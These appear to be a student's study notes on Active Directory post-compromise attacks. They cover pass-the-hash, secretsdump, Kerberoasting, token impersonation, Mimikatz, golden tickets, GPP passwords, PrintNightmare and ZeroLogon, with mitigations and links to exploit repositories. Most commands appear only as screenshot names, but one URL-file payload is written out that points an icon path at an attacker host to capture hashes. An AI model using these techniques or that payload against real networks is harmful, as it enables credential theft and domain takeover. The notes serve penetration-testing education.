AD_Post-Compromise_Attacks

Pass the Password Attacks

• All these attacks here involve having some credentials first , so we should have username or password or shell on the machine , etc.

• After compromising a machine with username and password we use pass the password technique.

• Instead of cracking the hash we use them and pass them around the network.

• Pass the password and try to pwn machines in the subnet :

  

  224.jpg
• Using Metasploit using psexec module :

  

  2252.jpg

  

  226.jpg
• Crackmapexec :

  • Needs username , password and the domain or user name and password and using - - local ( if it’s local account ).

  • When crackme doesn’t give me (pwn3d!) , this means that this password work and passing has succeed and if it ‘not pwn3d! this means that user doesn’t have SMB access to the domain controller.

    

    227.jpg
  • This will try to dump SAM file , sometimes it works and sometimes it doesn’t.

    

    228.jpg
  • And this will make us on authority system of another machine ( spiderman machine) and this will give us some information.

    

    230.jpg
  • Using password spray would work here but against domain accounts it’s not preferred but you can use password spray in local accounts and this another strategy when getting stuck or different passwords and patterns , here it’s better to try it with some different accounts even in admin account.

• Dumping Hashes with secretsdump.py :

  • We found that we have 2 machines with same local admin network.

  • psexec is less than noisy the metasploit way in getting hashes after getting the shell .

  • Getting hash dump - Dumping SAM , LSA and DPAPI key hashes - With 2 machines with eyes we can see if same hash shows up more than once :

    

    231.jpg
• Cracking NTLM Hashes with Hashcat :

  • I am here interested in user account and admin account when you dump SAM file this hashed using NTLM v2.

  • NTLM hashes can be passed NTLM B2 hashes cannot.

    

    232.jpg
  • Blank in front of hash means that the password is likely disabled. From cracking we could know the pattern of what password they use in the environment.

  • Local admin accounts are so important especially if you’re reusing these passwords.

  • Get hashes - Success in green plus :

    

    233.jpg
  • We can use these hashes and try to gain shell using psexec.py (Here we need all hashes NTLM and LLMNR) :

    • Here we aren’t able to get any admin access via this one , although user can get access to the machine we can’t get writeable share where you can upload and and get shell.

      

      234.jpg
• Mitigations :

  

  235.jpg

Token Impersonation

• If you can navigate to a machine and you find a token of a domain administrator that you can impersonate then you have domain admin.

• Token as cookies as they are temporary keys allow you access to a system or network without actually having to provide your credentials .

  

  236.jpg
• Here we have user and get the shell (we ‘re shell here in meterpter) using tool called Incognito in Metasploit.

  

  237.jpg
• Token Impersonation :

  

  238.jpg
• Using Invoke-Mimikatz powershell script to dump the hashes :

  

  239.jpg
• If a Domain Admin token was available :

  

  240.jpg

  

  242.jpg

  

  243.jpg

  • Running the script and dumping all hashes in the network .

• Setting options for begin the exploitation (set RHOSTS , LHOSTS ,payload) :

  

  246.jpg

  

  245.jpg

  • Get meterpeter session and get shell to the machine

  

  248.jpg

  • After we impersonate a token , we try to add user , local groups and etc -List tokens and get token for specific user and finally get the shell on this mcahine :

    

    250.jpg
  • Get hashdump will have some problem as we didn’t run the system of the machine but we solve this using rev2sel [Note : where get the hash dumb of machine we make Token personating to it & Another Note : All of these are delegation tokens ]

  • In this attack , we took a token of user left behind ( Like account on server that you might log into or get access to and there ‘s a domain admin who logged into that computer and server don’t don’t rebooted that much “Delegated token”—> Token setting here until the reboot happens - moving to from to machine escalte )

• Mitigation :

  • Limit user/group token create permissions.

  • Account tiering(Seperate accounts which on domain controllers and which didn’t) : Your domain administrator should logging into the machine that they need to access which should be domain controllers.

  • Local admin restriction : if users are not local admins on their computers we cannot get shell on the computer with their account.

Kerberoasting

• Useful Resources with more Information :

  Taming Kerberos - Computerphile

  57 Active Directory - Kerberos Authentication | Offensive Security Certified Professional

  • TGS-REQ - Present TGT request (TGS) : Messages written in SPN form this will use Kerberos authentication but it if ip written this will use NTLM authentication.

• Domain controllers is called as key distribution center (KDC) - We request for TGS (from service) using our TGT we get from previous stage - We receive TGS hashed by server.

  

  251.jpg
• Valid user account which gives a ticket granting (Steps 1 , 2) , then we can request a service ticket for a service and service ticket is going to be encrypted with these servers account hash (Crack the hash).

  

  252.jpg

  • Request service tickets then we get GTS with hash and this our time !!!

• All we need in this attack is username and password from a domain account ( domain we are interested in) - Service account shouldn’t be domain admin :

  

  253.jpg
• Mitigation : Strong Passwords - Least privilege.

GPP / cPassword Attacks

• Resource : Group Policy Pwnage:

  Pentesting in the Real World: Group Policy Pwnage | Rapid7 Blog

• Group Policy Preferences (GPP) [MS14-025] :

  • Group Policy preferences allowed admins to create policies using embedded credentials.

  • These Credentials were encrypted and placed in “cPassword”.

  • The key was accidentally released (whoops).

  • Patched in MS14-025 , but doesn’t prevent previous uses.

  • You search for Groups.xml when you search for GPP.

  • Port 445 open

  • Relation between SMB and GPP attack in Enumeration phase we find that 445 port (Which SMB port is open and the attack involves utilizing SMB ) and we search with SMB for anonymous access[ For challenge] —> Search for Group.xml.

  • When we in situation that we can use user credentials and TGS might have tipped off —> we think in Kerberoasting.

  • Final tip for challenge : If you have a credential and it doesn’t have to be that can get you onto the machine so we can use Kerberoasting or GPP to get stored credentials somewhere.

URL File Attacks

• Scenario : You have compromised a user and this user has any sort of file share access so we can utilize that access to capture more hashes using responder and get back to try to crack this hashes and may be get different users with more access.

• URL attack :

  • This ip address will go to be attacker ip address to catch the hash :

    

    254.jpg
  • Save this file in share folder :

    

    255jpg.jpg

    [InternetShortcut]
    URL=blah
    WorkingDirectory=blah
    IconFile=\\x.x.x.x\%USERNAME%.icon
    IconIndex=1

    

    256.jpg
  • To make this file at the top of the folder in file share folder and this ensures that it loads . Note the filename and save as type.

    

    257.jpg

    • Using Responder to get the hash.

    

    258.jpg

    • Getting hashes and you can relay to get to somewhere else it as well or crack it.

  • PrintNightmare (CVE-2021-1675) - Using Metasploit (msvenom) to create malicious dll to preform the attack “Generating payload” :

    https://github.com/cube0x0/CVE-2021-1675

    

    273.jpg

    

    274.jpg

    

    275.jpg

Mimikatz

• For download : https://github.com/gentilkiwi/mimikatz

• Using for Dump credentials on windows , extract plaint text password , PIN code and Kerbors tickets from memory - This tool can get up with windows then the tool get patched and go back and forth :

  

  259.jpg

  • This tool will be downloaded for our Windows 10 machine or Domain controller “Assuming we have compromised domain controller what we can do now and how to do persistence” .

• MimiKatz on Domain controller -Credential Dumping with Mimikatz :

  • Downloading and Exteracting mimikatz- there are different module on mimikatz with different potentials :

    

    260.jpg
  • First part in the command is the module (privilege::debug) to have debug on to bypass memory protections that are in the place especially for lsass.exe - Dump information out of memory.

    

    261.jpg
  • Some attacks (Different options) to do the last we talked about :

    • Dumping this for domain controller or regular computer are going to show us the computer username and NTLM (can be bypassed) hash for that and as well as any user that has logged since last reboot and that’s stored here in memory - Take advantage of wdigest.

      

      262.jpg
    • Trying to dump SAM file (Another way if we can’t do that here we have different ways ) -Might work :

      

      263.jpg
    • Dump LSA information - This dump is important as we can took this and crack it offline ( what percentage can we crack) as this number will relay back to client to tell him about password policy (If it strong or weak) “How Bad is you policy is” (Pentest Approach) -NTLM here for kerbros granting ticket and this will help in golden ticket attack :

      

      264.jpg
• Golden Ticket Attacks :

  • Here we will use golden ticket attack and pass attack- In mimikatz we dump Kerbros TGT account and with hash of that account we can generate kerbros TGT and then request access to any resource on the domain [Complete Access to the entire domain ].

  • Doing injection and pull down the actual user we wan not all users :

    

    265.jpg

    • We need SID of the domain , NTLM hash for kerbros TGT , then using kerbros and it doesn’t have to be real user - Getting familiar with id accounts to use it - ptt for passing the ticket - This will generate golden ticket and pass that ticket along to our nest session or current :

      

      266.jpg

      

      276.jpg
    • Get Command prompt - we can use psexec installed and gain access to the machine you want :

      

      277.jpg

About ZeroLogon

• Useful Resource :

  • What is ZeroLogon? - https://www.trendmicro.com/en_us/what-is/zerologon.html

  • dirkjanm CVE-2020-1472 - https://github.com/dirkjanm/CVE-2020-1472

  • SecuraBV ZeroLogon Checker - https://github.com/SecuraBV/CVE-2020-1472

• This bug enables us to attack domain controller ,setting password to null and take over domain controller. When run this attack if we do not restore the password , we will break the domain controller and this problem for pentest approach.

• Setting domain controller authentication basically to Null so we can authenticate with no password on the machine.

• Attack phases :

  • Check if our domain controller vulnerable for zerlogon attack :

    

    267.jpg
  • You should take care of not destroying the domain controller in real scenario if you fully sure to restore AD so it :

    

    268.jpg
  • After exploiting we will dump and do what we need to domain controller (Last phase here) :

    

    269.jpg
• Restore the machine -Using Administrator hash and get the clear password of it then use it with restorepassword.py - Looked for plain password hex as this will be used for restoring domain controllers and Remember take down domain controller is very dangerous :

  

  270.jpg

  

  271.jpg

  

  272.jpg

Conclusion

• Useful Resource for recapping : videos 56 , 57 , 58.

  Ahmed | @Limbo0x01

• Additional Resource :

  Active Directory Security – Active Directory & Enterprise Security, Methods to Secure Active Directory, Attack Methods & Effective Defenses, PowerShell, Tech Notes, & Geek Trivia…

  harmj0y